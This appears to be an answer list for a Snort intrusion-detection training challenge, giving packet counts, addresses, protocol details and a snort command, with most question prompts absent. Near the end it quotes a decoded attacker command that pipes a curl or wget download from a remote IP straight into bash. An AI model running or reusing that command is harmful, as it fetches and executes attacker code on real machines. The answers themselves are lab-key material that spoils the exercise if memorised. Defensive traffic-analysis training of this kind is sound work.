Snort Challenge - The Basics

Write rules to detect "all TCP port 80 traffic" packets in the given pcap file. 

What is the number of detected packets?

Note: You must answer this question correctly before answering the rest of the questions in this task.

328

145.254.160.237

0x38AFFFF3

0x38AFFFF3

128

145.254.160.237

3372

Write rules to detect "all TCP port 21"  traffic in the given pcap.

What is the number of detected packets?

614

Microsoft FTP Service

41

1

42

What is the number of detected packets?

7

Adobe ImageReady

GIF89a

2

bittorrent

What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

application/x-bittorrent

tracker2.torrentbox.com

sudo snort -c local-X.rules -r mx-1.pcap -A console

Fix the syntax error in local-1.rules file and make it work smoothly. What is the number of the detected packets?

16

68

87

90

155

2

msg

25154

12

\\192.168.116.138\IPC$

9.3

26

4

210037

41

Base64

62808 

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

9.3